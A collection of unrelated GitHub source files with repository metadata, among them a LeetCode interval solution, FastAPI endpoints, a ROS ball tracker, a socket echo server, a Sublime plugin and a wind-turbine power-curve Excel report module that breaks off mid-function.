|
35007890164
|
from src.main.python.Solution import Solution
from src.main.python.datastructures.Interval import Interval
# Given a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).
#
# You may assume that the intervals were initially sorted according to their start times.
#
# Example 1:
# Given intervals [1,3],[6,9], insert and merge [2,5] in as [1,5],[6,9].
#
# Example 2:
# Given [1,2],[3,5],[6,7],[8,10],[12,16], insert and merge [4,9] in as [1,2],[3,10],[12,16].
#
# This is because the new interval [4,9] overlaps with [3,5],[6,7],[8,10].
class Q057(Solution):
def insert(self, intervals, newInterval):
"""
:type intervals: List[Interval]
:type newInterval: Interval
:rtype: List[Interval]
"""
ans = []
if newInterval:
copy = newInterval
for interval in intervals:
if copy.start <= interval.end and interval.start <= copy.end:
copy.start = min(copy.start, interval.start)
copy.end = max(copy.end, interval.end)
elif copy.end < interval.start:
ans.append(copy)
copy = interval
else:
ans.append(interval)
ans.append(copy)
return ans
|
renkeji/leetcode
|
python/src/main/python/Q057.py
|
Q057.py
|
py
| 1,332 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72438613309
|
from fastapi import APIRouter, Body, Depends, Request, status
from fastapi.responses import JSONResponse
from jarvis.db.database import DataBase, get_database
from jarvis.core import config, utils
from jarvis.lib import TwilioHelper
from typing import Dict
from twilio.rest import Client
import jarvis.crud as crud
import jarvis.models as model
import jarvis.core.text_responses as text
router = APIRouter()
twilio_helper = TwilioHelper()
client = Client(config.TWILIO_ACCOUNT_SID, config.TWILIO_ACCOUNT_AUTH_TOKEN)
@router.post("/add")
async def add_item_to_cart(request: Request, db: DataBase = Depends(get_database)):
async with db.pool.acquire() as conn:
body = await request.form()
parsed_body = dict(body)
cart_item = model.CartItem(**parsed_body)
normalized_cart_item = await utils.normalize_cart_item_model(conn, cart_item)
cart_item_name = normalized_cart_item.get("name")
item_quantity = normalized_cart_item.get("quantity")
success_message = text.add_item_success(cart_item_name, item_quantity)
shopping_cart_message = text.shopping_cart_info(1)
msg = "".join([success_message, shopping_cart_message])
return twilio_helper.compose_mesage(msg)
# Make potentially a new helper class that has add item
# because you have to then convert this to a message after etc
# shopping_cart = model.ShoppingCart(**payload)
# return None
@router.get("/menu/{item_type}")
async def get_menu(
item_type: str, db: DataBase = Depends(get_database),
):
async with db.pool.acquire() as conn:
try:
items = await crud.get_all_item_by_type(conn, item_type)
message_list = [utils.item_model_to_message(item) for item in items]
message = "\n".join(message_list)
twilio_message = twilio_helper.compose_mesage(message)
return twilio_message
except UserWarning as warning:
return JSONResponse(
status_code=status.HTTP_202_ACCEPTED, content=str(warning)
)
@router.post("/checkout")
async def checkout_cart(
payload: Dict = Body(...), db: DataBase = Depends(get_database)
):
pass
@router.post("/sms")
async def get_twilio_text():
resp = ":)"
return utils.create_text_response(resp)
@router.get("/test")
async def twilio_test(payload: Dict = Body(...)):
message = client.messages.create(
body="Jarvis test",
messaging_service_sid=config.TWILIO_ACCOUNT_MESSAGING_SID,
to=config.TO_PHONE_NUMBER,
)
return message.sid
|
christian-miljkovic/jarvis
|
jarvis/api/v1/user_endpoint.py
|
user_endpoint.py
|
py
| 2,604 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26420619240
|
from datetime import timedelta, datetime
from typing import Optional
from fastapi import Depends, HTTPException, status
from fastapi.security import OAuth2PasswordBearer
from sqlalchemy.orm import Session
from jose import jwt, JWTError
from app import database, models
from app.schemas import TokenData
from app.config import settings
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="login")
SECRET_KEY = settings.secret_key
ALGORITHM = settings.algorithm
ACCESS_TOKEN_EXPIRE_MINUTES = settings.access_token_expire_minutes
def create_access_token(data: dict, expires_delta: Optional[timedelta] = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
def verify_access_token(token: str, credentials_exception):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
user_id: str = payload.get("user_id")
if user_id is None:
raise credentials_exception
token_data = TokenData(id=user_id)
except JWTError:
raise credentials_exception
return token_data
def get_current_user(
token: str = Depends(oauth2_scheme), db: Session = Depends(database.get_db)
):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
token = verify_access_token(token, credentials_exception)
user = db.query(models.User).filter(models.User.id == token.id).first()
return user
|
AdityaPunetha/FastAPI-Full-Devlopment
|
app/oauth2.py
|
oauth2.py
|
py
| 1,771 |
python
|
en
|
code
| 2 |
github-code
|
6
|
8950963065
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
from os import listdir, remove
import datetime as dt
from time import sleep
from MainMethods import getInfo, showDays
from conf import INT, INF, URL, LOC, NINF, LOC2,\
chosenF, errorsF, doneF
"""
The information for saved days is checked
and old files deleted.
"""
oldflags = [f for f in listdir(LOC2) if f[0]== "F"]
if oldflags:
for f in oldflags:
remove(f"{LOC2}\{f}")
saved= listdir(LOC)
if saved:
saved = [f.split(".csv")[0] for f in saved]
ints = [int(f.split("y")[-1]) for f in saved]
for i, f in enumerate(saved):
if ints[i] < dt.datetime.today().day and max(ints) -ints[i] <9:
remove(f"{LOC}\{f}.csv")
saved.remove(f)
def flagIt():
now = dt.datetime.timestamp(dt.datetime.now())
name = fr"{LOC2}\F{str(int(now))}.txt"
with open(name, "w") as F:
pass
sleep(2)
return name
def unflagIt(name):
remove(name)
def checkWait():
flag = [f for f in listdir(LOC2) if f[0] == "T"]
if flag:
while flag[0] in listdir(LOC2):
print("Wait, Sign Up in process....")
sleep(5)
checkWait()
flag = flagIt()
Chosen = pd.read_csv(chosenF)
Done = pd.read_csv(doneF)[NINF[-2]].to_list()
if Done:
print(f"These SignUps are done and should be confirmed by email:\n"
f"{Chosen[Chosen[NINF[-2]].isin(Done)][[NINF[0], NINF[1], NINF[2]]].to_string(index=False)}\n\n"
f"-------------------------------------------")
Chosen.drop(Chosen[Chosen[NINF[-2]].isin(Done)].index, inplace=True)
pd.DataFrame(columns= NINF).to_csv(doneF, index= False)
Errors = pd.read_csv(errorsF)[NINF[-2]].to_list()
if Errors:
print(f"The sign up for these classes failed:\n"
f"{Errors.iloc[:,:3]}\n"
f"Please check manually if you are still interested and "
f"allow them to be deleted from the program.")
conf = "n"
while conf.lower() != "y":
conf = input("Allow? (y/n):")
if conf.lower() == "y":
Errors = pd.DataFrame(columns= NINF)
Errors.to_csv(errorsF, index = False)
Chosen.drop(Chosen[Chosen[NINF[-2]].isin(Errors)].index, inplace=True)
else:
conf = input("There is no benefit in keeping them !\n"
"Are you sure "
"you don't want to let them go?\n"
"(y/n):")
Chosen.to_csv(chosenF, index= False)
"""
This uses requests and beautiful soup to setup
the iterators.
"""
r = requests.get(URL)
soup = BeautifulSoup(r.text, "lxml")
classes = soup.find(id= "classes")
days = classes.find_all(class_= "scheduleDay")[:8]
"""
The following loop gets the basic info from the websites
and keeps it in the dictionary DFs as DataFrames
"""
DFs = {}
for day in days:
date= day["id"]
if date in saved:
continue
DFs[date] = pd.DataFrame(columns= INF)
# iterate over each class in the day
dayclss = day.find_all("div")
for clss in dayclss:
#then within each class I select the link in "schedSignup"
if any(x in clss["class"] for x in INT):
link = clss.find(class_= "schedSignup").a["href"]
inf = getInfo(link)
DFs[date] = DFs[date].append(pd.Series(inf, index= INF), ignore_index=True)
"""
This condition runs the showDays loop to check
each new day's classes for availability and presents the options
"""
num = 0
NewDF = pd.DataFrame(columns= NINF)
if DFs:
result = showDays(DFs, num, NewDF)
NewDF, num = result[0], result[1]
#############
"""
Here, the requests waiting in the 'chosen' csv file
are presented and offered for cancellation
"""
# this just sets up the sig and UId variables for
sigs= [f for f in listdir(LOC2) if f[:3]== "Sig"]
if sigs:
with open(f"{LOC2}\{sigs[0]}", "r") as s:
UId = int(s.read())
##### Cancel
if Chosen.shape[0]:
print(f"\n============== OPTIONS TO CANCEL ======================\n"
f"These are signups that are waiting to be executed:\n\n"
f"{Chosen.iloc[:,:3]}\n\n"
f"Type in the row number on the left if you want to cancel it, seperate with commas\n"
f"Otherwise, just hit enter and confirm\n")
confirm = "n"
while confirm.lower() != "y":
inp = input("CANCEL:")
if inp:
try:
inp = list(map(int, inp.split(",")))
print(f"cancel these:\n"
f"{Chosen.loc[inp, [NINF[0], NINF[1], NINF[2]]]}")
confirm = input("Confirm (y/n):")
if confirm.lower() == "y":
Chosen.drop(inp, inplace=True)
except:
print(f"There seems to be a mistake in your input,\n"
f"please don't type any unnecessary commas, spaces or words.")
else:
confirm = input("Keep all (y/n):")
"""
If there are newly available classes:
the following while loop will get requests and
add the newly chosen ones to the 'chosen' csv file
It will also give Unique IDs to each class based on
the UId variable retrieved from the Signal File (SigA or SigB)
"""
##### Choose
if num:
print(f"=====================================\n"
f"The column on the RIGHT of each list contains the code to choose the class\n"
f"please type in your choice(s)"
f"(seperate codes with commas if you want multiple, hit enter if you want none.)\n")
confirm = "n"
while confirm.lower() != "y":
choice = input("Choice:")
if choice:
try:
choice = list(map(int,choice.split(",")))
chosen = NewDF[NewDF[NINF[-1]].isin(choice)].copy()
if max(choice) <= NewDF[NINF[-1]].max():
print(f"These are your new choices:\n"
f"{chosen.iloc[:,:3].to_string(index= False)}\n")
if Chosen.shape[0]:
print(f"These are still waiting to be executed:\n"
f"{Chosen.iloc[:, :3].to_string(index=False)}\n")
else:
print(f"There are no signups waiting.")
confirm = input("Confirm (y/n):")
else:
print(f"You may have forgotten a comma or got the wrong number,\n"
f"please try again")
except:
print(f"There seems to be a mistake in your input,\n"
f"please don't type any unnecessary commas, spaces or words.")
else:
print(f"You chose none.")
chosen = pd.DataFrame()
if Chosen.shape[0]:
print(f"These are still waiting to be executed:\n"
f"{Chosen.iloc[:, :3].to_string(index= False)}\n")
else:
print(f"There are no signups waiting.")
confirm = input("Confirm (y/n):")
if chosen.shape[0]:
chosen[NINF[-2]] = [UId +i for i in range(1, chosen.shape[0]+1)]
UId = chosen[NINF[-2]].max()
Chosen = Chosen.append(chosen, ignore_index=True)
# The days and requestes are saved
Chosen.to_csv(chosenF, index= False)
unflagIt(flag)
for d in DFs:
DFs[d].to_csv(fr"{LOC}\{d}.csv", index = False)
# The SigFile is updated
if sigs:
nxtSig = int(sigs[0].split(".")[0][3:])+1
remove(fr"{LOC2}\{sigs[0]}")
with open(fr"{LOC2}\Sig{nxtSig}.txt", "w") as s:
s.write(str(UId))
|
Stryder-Git/Movati_Signup
|
Get_Reqs.py
|
Get_Reqs.py
|
py
| 7,822 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16704619000
|
#!/usr/bin/env python
# Code property of Matteo Scanavino - [email protected]
# Minor changes by Iris David Du Mutel
import rospy
# from std_msgs.msg import Float32MultiArray
from myrobot.msg import vect_msg
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
import cv2
# import cv2.cv
import os
import math
import numpy as np
#import pyrealsense2 as rs
import message_filters
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import imutils #collection of OpenCV and Python convenience functions
from collections import deque
from scipy.spatial.transform import Rotation as R
def green_ball():
rospy.init_node('realsense_behaviour', anonymous=True)
pub = rospy.Publisher('gb_vect', vect_msg, queue_size=10)
color_sub = message_filters.Subscriber('camera/color/image_raw',Image)
# depth_sub = message_filters.Subscriber('camera/depth/image_raw',Image)
x_sub = message_filters.Subscriber('/odom',Odometry)
ts = message_filters.ApproximateTimeSynchronizer([color_sub, x_sub], queue_size=10,slop=0.1)
ts.registerCallback(callback,pub)
rospy.spin()
def callback(color_raw, x_sub,pub):
vect = [0, 0]
msg = vect_msg()
bridge = CvBridge()
greenLower = (29, 86, 6)
greenUpper = (64, 255, 255)
# realsense min and max distance
try:
color_image = bridge.imgmsg_to_cv2(color_raw, "bgr8")
except CvBridgeError as e:
print(e)
Xest = x_sub
# # Variable assignation:
[yaw, pitch, roll] = get_rotation(Xest)
psi_est = yaw*180/math.pi
frame = imutils.resize(color_image, width=600)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
center = None
if len(cnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
if x<280:
vect[0]=90
vect[1]=0
elif x>305:
vect[0]=-90
vect[1]=0
else:
if radius<100:
vect[0]=psi_est
vect[1]=0.8
else:
vect[0]= psi_est
vect[1]=0
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
print(center)
# only proceed if the radius meets a minimum size
if radius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(frame, (int(x), int(y)), int(radius),
(0, 255, 255), 2)
print('radius=', radius)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
else:
print('out of frame')
# show the frame to our screen
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# Send data
msg.header.stamp = rospy.Time.now()
msg.angle = vect[0]
msg.value = vect[1]
rospy.loginfo('Realsense vector data sent')
pub.publish(msg)
def get_rotation(Xest):
orientation_q = Xest.pose.pose.orientation
orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w]
r = R.from_quat(orientation_list)
EuAn = r.as_euler('zyx', degrees=False)
return EuAn
if __name__ == '__main__':
try:
green_ball()
except rospy.ROSInterruptException:
pass
|
IrisDuMutel/myrobot
|
scripts/green_ball.py
|
green_ball.py
|
py
| 4,054 |
python
|
en
|
code
| 1 |
github-code
|
6
|
1346892633
|
import threading
import socket
def server_echo (sock):
while True:
conn, addr = sock.accept()
while True:
data = conn.recv(1024)
if not data: break
if data == b"close":
# print ("Close connection")
break
conn.send(data)
# print (data)
conn.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.bind(('127.0.0.1', 2222))
s.bind(('0.0.0.0', 2222))
s.listen(10)
for i in range (10):
pserver = threading.Thread(target=server_echo, name="srv"+str (i+1), args=[s])
pserver.start()
|
gusevna/webserver
|
02_webserver.py
|
02_webserver.py
|
py
| 651 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30497846861
|
import unittest
from main import *
class TestEveryMethodInMain(unittest.TestCase):
def test_GetContainer(self):
self.assertIsNotNone(getPricesContainer())
self.assertIsNotNone(returnListedPricesToServer())
self.assertIsNotNone(returnInOrderedPricesToServer())
#checkPriceDiffWithDatabase
#getSearchedItems
def test_takeMinPriceFromRange(self):
_input = [{"CRL Eastern [Dominus]":{"Normal":{"price":[200,300]}}},{"Alchemist":{"Black":{"price":[2300,2500]}}},{"Overgrowth":{"Titanium White":{"price":[350,450]}},"Dominus":{"Lime":{"price":[4900,5300]}}}]
_output = [{"CRL Eastern [Dominus]":{"Normal":{"price":200}}},{"Alchemist":{"Black":{"price":2300}}},{"Overgrowth":{"Titanium White":{"price":350}},"Dominus":{"Lime":{"price":4900}}}]
self.assertEqual(takeMinPriceFromRange(_input), _output)
self.assertEqual(takeMinPriceFromRange([{"Item": {"paint": {"price":[21,37]}}}]), [{"Item": {"paint": {"price":21}}}])
def test_calculateQuickSellPrice(self):
_input = [{"CRL Eastern [Dominus]":{"Normal":{"price":200}}},{"Alchemist":{"Black":{"price":2300}}},{"Overgrowth":{"Titanium White":{"price":350}},"Dominus":{"Lime":{"price":4900}}}]
_output = [{"CRL Eastern [Dominus]":{"Normal":{"price":100}}},{"Alchemist":{"Black":{"price":2200}}},{"Overgrowth":{"Titanium White":{"price":250}},"Dominus":{"Lime":{"price":4800}}}]
self.assertEqual(calculateQuickSellPrice(_input, 100), _output)
# tests = [{input: [], expected: []},{items: [], expected: []}]
# for test in tests:
# assert(test.expected, takeMinPriceFromRange(test.items))
if __name__ == "__main__":
unittest.main()
|
rekjef/rl-tools
|
Price tracker/tests.py
|
tests.py
|
py
| 1,698 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75188708346
|
# May 10, 1981 00:31
# 정보 취합
month, day, year, time = input().split()
day = int(day[:-1])
year = int(year)
hour, minute = map(int, time.split(':'))
# 윤년 여부에 따라 2월 날짜 변경
month_name_lst = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
month_days_lst = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
if (year%400 == 0) or (year%4 == 0 and year%100 != 0):
month_days_lst[1] += 1
# 1년 총 시간 (단위는 분으로)
total_time = sum(month_days_lst) * 24 * 60
# 현재 총 시간
current_month_idx = month_name_lst.index(month)
current_time = (sum(month_days_lst[:current_month_idx]) + day-1)*24*60 + hour*60 + minute
print(current_time/total_time*100)
|
zacinthepark/Problem-Solving-Notes
|
boj/1340.py
|
1340.py
|
py
| 765 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
71567925627
|
import os
while True:
info = input().split("-")
if info[0] == 'Create':
file = open(f"files/{info[1]}", "w")
file.close()
elif info[0] == 'Add':
with open(f"files/{info[1]}", "a") as file:
file.write(f"{info[2]}\n")
elif info[0] == 'Replace':
try:
with open(f"files/{info[1]}", "r+") as file:
text = file.readlines()
file = open(f"files/{info[1]}", "w")
for i in range(len(text)):
text[i] = text[i]. replace(info[2], info[3])
file.write("".join(text))
file.close()
except FileNotFoundError:
print("An error occurred")
elif info[0] == 'Delete':
try:
os.remove(f"files/{info[1]}")
except FileNotFoundError:
print("An error occurred")
else:
break
|
lorindi/SoftUni-Software-Engineering
|
Python-Advanced/7.File Handling/3_file_manipulator.py
|
3_file_manipulator.py
|
py
| 879 |
python
|
en
|
code
| 3 |
github-code
|
6
|
18667310322
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
import sublime, sublime_plugin
from os import path
class GoToPackageFileCommand(sublime_plugin.TextCommand):
def run(self, edit):
f = self.view.file_name()
curFolder = path.dirname(f)
print("Current folder: {0}".format(curFolder))
packagejs = self.find_package_js(curFolder)
if packagejs:
print("Found {0}".format(packagejs))
sublime.active_window().open_file(packagejs)
else:
sublime.status_message("package.js not found in hierarchy of {0}".format(curFolder))
def find_package_js(self, f):
print("Checking '{0}'".format(f))
packagejs = path.join(f, "package.js")
if path.isfile(packagejs):
return packagejs
else:
newF = path.dirname(f)
if newF != f:
return self.find_package_js(newF)
|
Eliga/sublime-update-package-js
|
GoToPackageFile.py
|
GoToPackageFile.py
|
py
| 989 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27099720616
|
import xlwt
import numpy as np
import os
import os.path
import colour
from ..configuration.base_configuration import Filter
from ..configuration.base_configuration import TimeOfDayFilter
from ..core.status import Status
from plots import MatplotlibPlotter
from power_deviation_matrix import PowerDeviationMatrixSheet
import version as ver
def get_valid_excel_sheet_name(sheet_name, if_too_long_replace={}):
max_chars = 31
invalid_chars = ':|\\/*?[]'
for c in invalid_chars:
sheet_name = sheet_name.replace(c, '')
if len(sheet_name) > max_chars:
for sub_str in if_too_long_replace:
sheet_name = sheet_name.replace(sub_str, if_too_long_replace[sub_str])
return sheet_name[:max_chars]
def chckMake(path):
"""Make a folder if it doesn't exist"""
if not os.path.exists(path):
os.makedirs(path)
class PNGPlotter:
def plot(self, analysis, path):
chckMake(path)
plotter = MatplotlibPlotter(path, analysis)
if analysis.hasActualPower:
plotter.plotPowerCurve(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve, specified_title = 'Warranted', mean_title = 'Measured Mean', gridLines = True)
plotter.plotPowerCurve(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve, show_scatter = False, fname = "PowerCurve - Warranted vs Measured Mean", specified_title = 'Warranted', mean_title = 'Measured Mean', mean_pc_color = 'blue', gridLines = True)
if analysis.turbRenormActive:
plotter.plotTurbCorrectedPowerCurve(analysis.baseline.wind_speed_column, analysis.measuredTurbulencePower, analysis.allMeasuredTurbCorrectedPowerCurve)
if analysis.hasAllPowers:
plotter.plotPowerLimits(specified_title = 'Warranted', gridLines = True)
plotter.plotBy(analysis.windDirection, analysis.hubWindSpeed, analysis.dataFrame, gridLines = True)
plotter.plotBy(analysis.windDirection, analysis.shearExponent, analysis.dataFrame, gridLines = True)
plotter.plotBy(analysis.windDirection, analysis.hubTurbulence, analysis.dataFrame, gridLines = True)
plotter.plotBy(analysis.hubWindSpeed, analysis.hubTurbulence, analysis.dataFrame, gridLines = True)
if analysis.hasActualPower:
plotter.plotBy(analysis.hubWindSpeed, analysis.powerCoeff, analysis.dataFrame, gridLines = True)
plotter.plotBy('Input Hub Wind Speed', analysis.powerCoeff, analysis.allMeasuredPowerCurve, gridLines = True)
if analysis.inflowAngle in analysis.dataFrame.columns:
analysis.dataFrame.loc[analysis.dataFrame[analysis.inflowAngle]>180,analysis.inflowAngle] -= 360
plotter.plotBy(analysis.windDirection,analysis.inflowAngle,analysis.dataFrame, gridLines = True)
plotter.plotCalibrationSectors()
if analysis.hasActualPower:
if analysis.multiple_datasets:
plotter.plot_multiple(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve)
class TimeSeriesExporter:
def export(self, analysis, time_series_path, clean=True, full=True, calibration=True,
full_df_output_dir="TimeSeriesData"):
data_frame = analysis.dataFrame
dataset_configs = analysis.datasetConfigs
if clean:
data_frame.to_csv(time_series_path, sep='\t')
if full:
root_path = os.path.join(os.path.dirname(time_series_path), full_df_output_dir)
chckMake(root_path)
for ds in dataset_configs:
ds.data.fullDataFrame.to_csv(root_path + os.sep + "FilteredDataSet_AllColumns_{0}.dat".format(ds.name),
sep='\t')
if calibration and hasattr(ds.data,"filteredCalibrationDataframe"):
ds.data.filteredCalibrationDataframe.to_csv(
root_path + os.sep + "CalibrationDataSet_{0}.dat".format(ds.name), sep=',')
class Report:
bold_style = xlwt.easyxf('font: bold 1')
no_dp_style = xlwt.easyxf(num_format_str='0')
one_dp_style = xlwt.easyxf(num_format_str='0.0')
two_dp_style = xlwt.easyxf(num_format_str='0.00')
three_dp_style = xlwt.easyxf(num_format_str='0.000')
four_dp_style = xlwt.easyxf(num_format_str='0.0000')
percent_style = xlwt.easyxf(num_format_str='0.00%')
percent_no_dp_style = xlwt.easyxf(num_format_str='0%')
def __init__(self, windSpeedBins, calculated_power_deviation_matrix_dimensions):
self.version = ver.version
self.windSpeedBins = windSpeedBins
self.calculated_power_deviation_matrix_dimensions = calculated_power_deviation_matrix_dimensions
def report(self, path, analysis):
report_power_curve = analysis.hasActualPower
book = xlwt.Workbook()
plotsDir = os.path.dirname(path)
plotter = PNGPlotter()
plotter.plot(analysis, plotsDir)
gradient = colour.ColourGradient(-0.1, 0.1, 0.01, book)
if report_power_curve:
sh = book.add_sheet("PowerCurves", cell_overwrite_ok=True)
settingsSheet = book.add_sheet("Settings", cell_overwrite_ok=True)
self.reportSettings(settingsSheet, analysis)
if report_power_curve:
rowsAfterCurves = []
#rowsAfterCurves.append(self.reportPowerCurve(sh, 0, 0, 'uniqueAnalysisId', analysis.specified_power_curve, analysis)) #needs fixing + move to settings sheet
if analysis.specified_power_curve is not None:
if len(analysis.specified_power_curve.data_frame) != 0:
rowsAfterCurves.append( self.reportPowerCurve(sh, 1, 0, 'Specified', analysis.specified_power_curve, analysis))
if analysis.hasActualPower:
#for name in analysis.residualWindSpeedMatrices:
# residualMatrix = analysis.residualWindSpeedMatrices[name]
#
# if residualMatrix != None:
# self.reportPowerDeviations(book, "ResidualWindSpeed-%s" % name, residualMatrix, gradient)
if analysis.hasShear and analysis.innerMeasuredPowerCurve != None:
rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 5, 'Inner', analysis.innerMeasuredPowerCurve, analysis) )
if analysis.hasShear and analysis.outerMeasuredPowerCurve != None:
rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 10, 'Outer', analysis.outerMeasuredPowerCurve, analysis) )
rowsAfterCurves.append( self.reportPowerCurve(sh, 1, 15, 'All', analysis.allMeasuredPowerCurve, analysis) )
if analysis.turbRenormActive:
rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 20, 'TurbulenceRenormalisedPower', analysis.allMeasuredTurbCorrectedPowerCurve, analysis) )
if analysis.specified_power_curve is not None:
rowAfterCurves = max(rowsAfterCurves) + 5
sh.write(rowAfterCurves-2, 0, "Power Curves Interpolated to Specified Bins:", self.bold_style)
specifiedLevels = analysis.specified_power_curve.data_frame.index
if analysis.hasShear and analysis.innerMeasuredPowerCurve != None:
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 5, 'Inner', analysis.innerMeasuredPowerCurve, specifiedLevels)
if analysis.hasShear and analysis.outerMeasuredPowerCurve != None:
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 10, 'Outer', analysis.outerMeasuredPowerCurve, specifiedLevels)
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 15, 'All', analysis.allMeasuredPowerCurve, specifiedLevels)
if analysis.turbRenormActive:
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 20, 'TurbulenceRenormalisedPower', analysis.allMeasuredTurbCorrectedPowerCurve, specifiedLevels)
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, (25 if analysis.turbRenormActive else 20), 'DayTime', analysis.dayTimePowerCurve, specifiedLevels)
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, (30 if analysis.turbRenormActive else 25), 'NightTime', analysis.nightTimePowerCurve, specifiedLevels)
self.reportPowerDeviations(book, "Baseline Power Deviations", analysis.baseline_power_deviations, gradient)
#if analysis.rewsActive:
# self.reportPowerDeviations(book, "REWS Deviation", analysis.rewsMatrix, gradient)
for correction_name in analysis.corrections:
correction = analysis.corrections[correction_name]
deviations = analysis.corrected_deviations[correction.correction_name]
sheet_name = get_valid_excel_sheet_name("{0} Power Deviations".format(
correction.short_correction_name), if_too_long_replace={'Power Deviations': 'PowDevs'})
self.reportPowerDeviations(book, sheet_name, deviations, gradient)
if analysis.nominal_wind_speed_distribution.absolute_path is not None:
sh = book.add_sheet("EnergyAnalysis", cell_overwrite_ok=True)
self.report_aep(sh, analysis)
if len(analysis.calibrations) == 1:
calSheet = book.add_sheet("Calibration", cell_overwrite_ok=True)
self.reportCalibration(calSheet,analysis.calibrations[0],timeStepInSeconds = analysis.timeStepInSeconds)
elif len(analysis.calibrations) > 1:
i = 0
for cal in analysis.calibrations:
i += 1
calSheet = book.add_sheet("Calibration_%03d" % i, cell_overwrite_ok=True)
self.reportCalibration(calSheet,cal,timeStepInSeconds = analysis.timeStepInSeconds)
book.save(path)
def reportCalibration(self,sh,calibration,timeStepInSeconds = 600.):
conf, calib = calibration
sh.write(0, 0, "Dataset Name", self.bold_style)
sh.write(1, 0, conf.name)
startRow = 3
col = -14
if 'belowAbove' in calib.calibrationSectorDataframe.columns :
belowAbove = True
else:
belowAbove = False
col+=16
row=startRow
sh.write(row,col,conf.name, self.bold_style)
sh.write(row,col+1,"Method:"+conf.calibrationMethod, self.bold_style)
row += 1
sh.write(row,col,"Bin", self.bold_style)
sh.write(row,col+1,"Slope", self.bold_style)
sh.write(row,col+2,"Offset", self.bold_style)
if conf.calibrationMethod != 'Specified':
sh.write(row,col+3,"Count", self.bold_style)
sh.write(row,col+4,"Hours", self.bold_style)
if belowAbove:
sh.write(row,col+5,"Count <= 8m/s", self.bold_style)
sh.write(row,col+6,"Hours <= 8m/s", self.bold_style)
sh.write(row,col+7,"Count > 8m/s", self.bold_style)
sh.write(row,col+8,"Hours > 8m/s", self.bold_style)
sh.write(row,col+9,"Speedup at 10m/s", self.bold_style)
sh.write(row,col+10,"% Speedup at 10m/s", self.bold_style)
sh.write(row,col+11,"Filter (Total Hours > 24)", self.bold_style)
sh.write(row,col+12,"Filter (Hours Below/Above 8m/s > 6)", self.bold_style)
sh.write(row,col+13,"Filter (Speedup Change < 2%)", self.bold_style)
sh.write(row,col+14,"Valid Sector", self.bold_style)
row+=1
for key in sorted(calib.calibrationSectorDataframe.index):
sh.write(row,col,float(key), self.bold_style)
sh.write(row,col+1,calib.calibrationSectorDataframe['Slope'][key], self.four_dp_style)
sh.write(row,col+2,calib.calibrationSectorDataframe['Offset'][key], self.four_dp_style)
if conf.calibrationMethod != 'Specified':
if 'Count' in calib.calibrationSectorDataframe.columns:
sh.write(row,col+3,calib.calibrationSectorDataframe['Count'][key], self.no_dp_style)
sh.write(row,col+4,calib.calibrationSectorDataframe['Count'][key]*(timeStepInSeconds/3600.0), self.one_dp_style)
if belowAbove:
ba = calib.calibrationSectorDataframe.loc[key,'belowAbove']
sh.write(row,col+5,ba[0], self.no_dp_style)
sh.write(row,col+6,ba[0]*(timeStepInSeconds/3600.0), self.one_dp_style)
sh.write(row,col+7,ba[1], self.no_dp_style)
sh.write(row,col+8,ba[1]*(timeStepInSeconds/3600.0), self.one_dp_style)
sh.write(row,col+9,calib.calibrationSectorDataframe['SpeedUpAt10'][key], self.four_dp_style)
sh.write(row,col+10,(calib.calibrationSectorDataframe['SpeedUpAt10'][key]-1.0), self.percent_style)
totalHoursValid = calib.getTotalHoursValidity(key, timeStepInSeconds)
